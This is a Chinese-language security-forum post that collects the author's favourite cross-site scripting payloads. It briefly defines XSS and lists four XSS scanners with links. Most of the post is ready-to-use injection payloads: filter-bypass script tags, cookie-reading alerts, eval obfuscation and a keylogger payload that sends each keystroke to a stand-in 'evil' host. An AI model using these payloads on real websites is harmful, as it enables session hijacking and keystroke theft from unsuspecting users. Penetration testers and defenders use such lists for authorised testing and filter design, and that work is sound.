[18677] 2018-05-06_工具集-XSSPayload

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-18
工具集-XSSPayload

工具集-XSS Payload

crhua huasec 2018-05-06

XSS介绍

Cross Site Script(XSS) 是将恶意脚本注入到网站中,当攻击者使用web 程序将恶意脚本发送给不同的用户时,就造成了XSS攻击,XSS攻击发生在web 程序任何输入的地方,其根本问题是web程序没有对输入输出做验证和编码。

XSS漏洞扫描工具

  1. BruteXSS  

    https://github.com/shawarkhanethicalhacker/BruteXSS

  2. XSStrike    

    https://github.com/UltimateHackers/XSStrike

  3. XSSer         kali 自带

   4. xsscrpay    

       https://github.com/DanMcInerney/xsscrapy

XSS Payload

<svg/onload=alert('crhua')>
"><svg/onload=alert('crhua')>

<input src=x v- on:error="$event.target.ownerDocument.defaultView.alert('xss')">

<<a>scriPt>alert(document.cookie)<</a>/sCript>
<<a>img src=/ onerror=confiru006d(document.cookie)/><<a>script>

";alert(document.domain);//
;alert(document.domain);//
&#92;&quot;;alert(document.domain);//

s='"><script>alert(1)</script>' print
print
'eval(String.fromCharCode('+",".join([str(ord(o))
for o ins])+'))'

<script x>alert('XSS')<script y>
"><script>alert("1");//<</script>
;[].constructor.prototype.join=function(){return'pwnd'};eval('alert(1)')

import('data:text/javascript,alert(1)')
<w="/x="y>"/ondblclick=`<`[confiru006d``]>
<x oncut=y=prompt,y``>z
<o/onmouseover=o=prompt,o``>o

<link rel='preload' href='#' as='script' onload='confirm(domain)'>

<img/src=q onerror='new Function`alert`1``'>
<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>
<img onerror=event.path.pop().alert(1) src>
<img src=x onerror='document.onkeypress=function(e){fetch("//evil?k="+String.fromCharCode(e.which))},this.remove();'>
<math><annotation-xml><textarea/><svg><script>alert(1)</script>
</script><script><!----!><svg/onload=alert``//-->

这是我常用的XSS payload ,更多payload 移步我的github

https://github.com/crhua/xsspayload.git

总结

    利用工具挖掘XSS漏洞效率太低,更多的时候是自己手工测试,多看看前辈们写的payload,挖洞的时候构造自己的payload。

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则